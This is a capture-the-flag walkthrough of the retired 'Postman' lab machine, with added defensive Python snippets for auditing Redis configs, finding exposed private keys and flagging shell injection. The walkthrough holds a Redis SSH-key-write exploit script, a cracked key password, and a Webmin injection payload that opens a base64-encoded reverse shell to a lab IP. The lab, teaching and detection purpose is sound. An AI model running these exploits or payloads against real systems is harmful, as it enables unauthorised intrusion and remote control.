| Name | Postman |
|---|---|
| Release Date | 02 Nov 2019 |
| Retire Date | 14 Mar 2020 |
| OS | Linux |
| Base Points | Easy - Retired [0] |
| Rated Difficulty | |
| Radar Graph | |
| sampriti | 00 days, 02 hours, 45 mins, 58 seconds |
| anymuz | 00 days, 02 hours, 55 mins, 04 seconds |
| Creator | TheCyberGeek |
| CherryTree File | CherryTree - Remove the .txt extension |
Again, we start with `nmap -sC -sV -Pn -p- -oA ./Postman 10.10.10.160`:

```text
$ nmap -sC -sV -Pn -p- -oA ./Postman 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 14:05 EDT
Nmap scan report for 10.10.10.160
Host is up (0.025s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.42 seconds
```
We have SSH, HTTP, Redis, and MiniServ to look at. Redis is the odd one out, so `searchsploit Redis` first:

```text
$ searchsploit Redis
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
Redis - Replication Code Execution (Metasploit)                          | linux/remote/48272.rb
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)            | linux/remote/47195.rb
Redis 5.0 - Denial of Service                                            | linux/dos/44908.txt
```
Redis-cli
By now, you all know my aversion to Metasploit, but now that I know what to look for, I'm sure I can find a method of exploit outside of MSF. We come across CVE-2018-12326. So, to start, let's install redis on our Kali box so we have redis-tools for later:

```shell
sudo apt-get install redis
```

From there, we should be able to connect to the box with `redis-cli -h 10.10.10.160`. Once connected, we can try a `CONFIG GET *` just to see whether we can actually execute anything unauthenticated. Not surprisingly, we can.

There are 178 or so entries in that command's output, but all we really needed to know was that we could execute. Running `CONFIG GET DIR` shows us that we are operating in the /var/lib/redis directory. Avinash had a pre-built exploit written here, but let's examine what it is actually doing (or it's no better than using MSF).
```python
#!/usr/bin/python
#Author : Avinash Kumar Thapa aka -Acid
#Twitter : https://twitter.com/m_avinash143
#################################################
import os
import os.path
from sys import argv
from termcolor import colored

script, ip_address, username = argv
PATH = '/usr/bin/redis-cli'
PATH1 = '/usr/local/bin/redis-cli'


def ssh_connection():
    shell = "ssh -i " + '$HOME/.ssh/id_rsa ' + username + "@" + ip_address
    os.system(shell)


if os.path.isfile(PATH) or os.path.isfile(PATH1):
    try:
        print colored('\t*******************************************************************', "green")
        print colored('\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*', "green")
        print colored('\t* [+] AVINASH KUMAR THAPA aka "-Acid" ', "green")
        print colored('\t*******************************************************************', "green")
        print "\n"
        print colored("\t SSH Keys Need to be Generated", 'blue')
        os.system('ssh-keygen -t rsa -C \"acid_creative\"')
        print colored("\t Keys Generated Successfully", "blue")
        os.system("(echo '\r\n\'; cat $HOME/.ssh/id_rsa.pub; echo \'\r\n\') > $HOME/.ssh/public_key.txt")
        cmd = "redis-cli -h " + ip_address + ' flushall'
        cmd1 = "redis-cli -h " + ip_address
        os.system(cmd)
        cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " + ip_address + ' -x set cracklist'
        os.system(cmd2)
        cmd3 = cmd1 + ' config set dbfilename "backup.db" '
        cmd4 = cmd1 + ' config set dir' + " /home/" + username + "/.ssh/"
        cmd5 = cmd1 + ' config set dbfilename "authorized_keys" '
        cmd6 = cmd1 + ' save'
        os.system(cmd3)
        os.system(cmd4)
        os.system(cmd5)
        os.system(cmd6)
        print colored("\tYou'll get shell in sometime..Thanks for your patience", "green")
        ssh_connection()
    except:
        print "Something went wrong"
else:
    print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red")
```
OK. It looks like this script is creating SSH keys and transferring them via redis-cli to the target. We could do that manually, but as I've said, hackers are lazy creatures. I'll re-use code/scripts as long as I understand what they are doing. That said, this script looks like it needs a valid username on the box, which we don't have. However, checking `keys *` in redis-cli and using `GET cracklist`, I can see the key that was created. Perhaps I can force the connection via key.

Now, before I go celebrating, this shell/user can hardly do anything. Round 2. Jump to /tmp, grab LinEnum.sh and run it thoroughly to see what jumps out. And it does! /opt/id_rsa.bak, owned by "Matt". Let's see if we can view it.
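Everything that script does depends on one thing: the Redis instance accepts `CONFIG SET dir`, `CONFIG SET dbfilename` and `SAVE` from anyone on the network. As an added example (not from the writeup, and not Avinash's code), here is a small audit of a redis.conf that flags exactly the settings involved: a bind on all interfaces, protected-mode off, no `requirepass`, and CONFIG / FLUSHALL / DEBUG still callable by name. Both sample configs are constructed, and the password in the hardened one is a placeholder.

```python
"""Audit a redis.conf for the settings that let an unauthenticated client
rewrite dir/dbfilename and save a database into a user's .ssh directory.
Added example, not part of the original writeup; both sample configs are
constructed."""

# Commands worth hiding from clients. SAVE is deliberately not on the list:
# persistence needs it, and once CONFIG is unreachable it can only write to
# the directory the admin configured.
RISKY_COMMANDS = {"CONFIG", "FLUSHALL", "DEBUG"}

# constructed: resembles an instance exposed the way this box was
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# constructed: the same instance after hardening (password is a placeholder)
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command DEBUG ""
dir /var/lib/redis
"""


def parse_redis_conf(text):
    """Map each directive to the list of values it appears with (comments skipped)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(parts[0].lower(), []).append(value)
    return conf


def audit_redis_conf(text):
    """Return a list of finding strings; an empty list means nothing obvious is wrong."""
    conf = parse_redis_conf(text)
    findings = []

    # Redis listens on every interface unless a bind line restricts it
    binds = conf.get("bind", [])
    bind_tokens = {tok for b in binds for tok in b.split()}
    if not binds or bind_tokens & {"0.0.0.0", "::", "*"}:
        findings.append("bind: reachable on all interfaces")

    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")

    if not conf.get("requirepass", [""])[-1]:
        findings.append("requirepass: unset, every client is trusted")

    # rename-command <NAME> "" disables the command entirely
    disabled = set()
    for entry in conf.get("rename-command", []):
        parts = entry.split()
        if len(parts) == 2 and parts[1] in ('""', "''"):
            disabled.add(parts[0].upper())
    for cmd in sorted(RISKY_COMMANDS - disabled):
        findings.append('%s: still callable (rename-command %s "")' % (cmd, cmd))

    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print("%s config: %s" % (label, audit_redis_conf(text) or ["no findings"]))
```

Run it against a real redis.conf by reading the file into `audit_redis_conf`. The bind check is deliberately strict: protected-mode alone would have blocked remote clients on a config with no bind line and no password, but relying on that default is how boxes like this one end up exposed once someone sets `bind 0.0.0.0`.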
So, it's encrypted. A simple ssh2john run handles that:

```shell
sudo /usr/share/john/ssh2john.py key.enc > clearkey.enc
sudo john --wordlist=/usr/share/wordlists/rockyou.txt clearkey.enc
```

It looks like Matt has a password of computer2008. Move from redis to Matt and grab the user flag. There's not a lot more we can do in the CLI right now, so let's jump over to port 10000 and its MiniServ Webmin page. Logging in with Matt:computer2008, we can grab the Webmin version (1.910) and see what's there. I eventually come across this Proof of Concept on GitHub and try it out, crafting my payload using:
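The lesson from /opt/id_rsa.bak is that a private key backup readable by every local user is only as strong as its passphrase, and rockyou.txt just showed how strong that was. As an added example (not from the writeup), here is a scan that walks a directory tree, spots private key files by their PEM/OpenSSH markers, tells you whether each is passphrase-protected, and whether it is world-readable. The sample tree it builds is constructed, including a fake encrypted PEM and a minimal unencrypted OpenSSH-format blob.

```python
"""Find private keys lying around on a filesystem and report whether each is
passphrase-protected and whether other users can read it. Added example, not
part of the original writeup; the sample tree is constructed."""
import base64
import os
import stat
import tempfile

KEY_MARKERS = (
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
    b"-----BEGIN ENCRYPTED PRIVATE KEY-----",
)


def openssh_v1_cipher(data):
    """Return the cipher name stored in an 'openssh-key-v1' blob ('none' when unencrypted)."""
    lines = data.decode("ascii", "replace").splitlines()
    body = "".join(l for l in lines if l and not l.startswith("-----"))
    try:
        blob = base64.b64decode(body, validate=True)
    except ValueError:
        return None
    magic = b"openssh-key-v1\x00"
    if not blob.startswith(magic):
        return None
    off = len(magic)
    n = int.from_bytes(blob[off:off + 4], "big")  # length-prefixed cipher name
    return blob[off + 4:off + 4 + n].decode("ascii", "replace")


def classify_key(data):
    """Return (is_private_key, is_encrypted) from the first bytes of a file."""
    head = data[:8192]
    if not any(m in head for m in KEY_MARKERS):
        return False, False
    # classic PEM marks a passphrase with a Proc-Type header; PKCS#8 uses its own BEGIN line
    if b"Proc-Type: 4,ENCRYPTED" in head or b"BEGIN ENCRYPTED PRIVATE KEY" in head:
        return True, True
    if b"BEGIN OPENSSH PRIVATE KEY" in head:
        cipher = openssh_v1_cipher(head)
        return True, cipher is not None and cipher != "none"
    return True, False


def find_private_keys(root):
    """Walk root; return sorted (relative path, encrypted, world_readable) for each key file."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(8192)
            except OSError:
                continue
            is_key, encrypted = classify_key(head)
            if is_key:
                world_readable = bool(os.stat(path).st_mode & stat.S_IROTH)
                found.append((os.path.relpath(path, root), encrypted, world_readable))
    return sorted(found)


def build_sample_tree():
    """Constructed sample: a passphrase-protected backup key readable by everyone
    (the /opt/id_rsa.bak situation), a properly protected unencrypted key, and a non-key."""
    root = tempfile.mkdtemp(prefix="keyscan-")
    enc_pem = (b"-----BEGIN RSA PRIVATE KEY-----\n"
               b"Proc-Type: 4,ENCRYPTED\n"
               b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
               b"QUJDREVGR0g=\n"
               b"-----END RSA PRIVATE KEY-----\n")
    # minimal openssh-key-v1 header: magic, ciphername "none", kdfname "none"
    blob = b"openssh-key-v1\x00" + b"\x00\x00\x00\x04none" + b"\x00\x00\x00\x04none"
    plain_openssh = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob)
                     + b"\n-----END OPENSSH PRIVATE KEY-----\n")
    samples = {
        "opt/id_rsa.bak": (enc_pem, 0o644),
        "home/matt/.ssh/id_rsa": (plain_openssh, 0o600),
        "etc/motd": (b"welcome\n", 0o644),
    }
    for rel, (content, mode) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for rel, encrypted, world in find_private_keys(build_sample_tree()):
        print("%-24s encrypted=%-5s world-readable=%s" % (rel, encrypted, world))
```

Pointed at `/` on a real host it is a quick way to find the id_rsa.bak-style leftovers before a LinEnum run does. An encrypted key that is world-readable still belongs in the findings: as the john run above shows, the passphrase is the only thing standing between a low-privilege shell and the next user.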
```shell
echo -n 'bash -c "bash -i >& /dev/tcp/10.10.14.10/9999 0>&1"' | base64
u=acl%2Fapt&u=$(echo${IFS}YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMC80NDQ0IDA+JjEi|base64${IFS}-d|bash)
nc -lvnp 9999
```

Let's send it off and see if it works. I did have to change the + signs to %2b, but after that, boom! We have a winner and a root shell.
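The Webmin bug here is the classic shape: a form value is handed straight to a shell, so `$(...)`, `${IFS}` and a pipe into `base64 -d | bash` all survive into the command line. As an added example (not from the writeup or the PoC it links), this is a filter that decodes an x-www-form-urlencoded body and flags values carrying shell metacharacters, the kind of check a reverse proxy in front of MiniServ or a request-log review can apply. The three sample bodies are constructed; the injected one keeps the payload's shape but with harmless base64 ("ABC") in place of the real command. It is a detection layer, not a substitute for patching Webmin.

```python
"""Flag form parameters that carry shell-injection indicators before a CGI
handler ever sees them. Added example, not part of the original writeup; the
sample bodies are constructed."""
import re
from urllib.parse import parse_qsl

# Ordered: the first matching reason is the one reported for a value
SHELL_INDICATORS = (
    (r"\$\(", "command substitution $(...)"),
    (r"`", "backtick command substitution"),
    (r"\$\{IFS\}", "${IFS} used to avoid literal spaces"),
    (r"\|\s*(sh|bash|dash|perl|python)\b", "pipe into an interpreter"),
    (r"\b(base64|xxd)\b[^|]*\|", "decoder inside a pipeline"),
    (r"[;&|\n]\s*\w", "command chaining"),
)

# Package names on this page look like acl/apt: letters, digits and a few separators.
# Values matching this are accepted without further inspection.
PACKAGE_NAME = re.compile(r"^[A-Za-z0-9_./+-]+$")

# constructed: what a legitimate package-update request looks like
BENIGN_BODY = "u=acl%2Fapt&u=acl%2Fcurl"
# constructed: the shape of the payload in the writeup, with harmless base64 ("ABC")
INJECTED_BODY = "u=acl%2Fapt&u=$(echo${IFS}QUJD|base64${IFS}-d|bash)"
# constructed: plain command chaining through a URL-encoded semicolon
CHAINED_BODY = "u=acl%2Fapt%3Bid"


def check_form_body(body):
    """Decode an x-www-form-urlencoded body; return (param, value, reason) per suspicious value.

    parse_qsl applies the same decoding the CGI will: '+' becomes a space and
    '%2b' becomes '+', so the filter sees the value the shell would have seen.
    """
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if PACKAGE_NAME.match(value):
            continue
        for pattern, reason in SHELL_INDICATORS:
            if re.search(pattern, value):
                hits.append((name, value, reason))
                break
    return hits


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("injected", INJECTED_BODY), ("chained", CHAINED_BODY)):
        print("%-9s %s" % (label, check_form_body(body) or "clean"))
```

The allow-list comes first on purpose: anything that looks like a package name passes without pattern matching, and only values that fall outside it are inspected. That keeps the rule cheap and means a new evasion trick only has to be added to `SHELL_INDICATORS`, not to the allow-list.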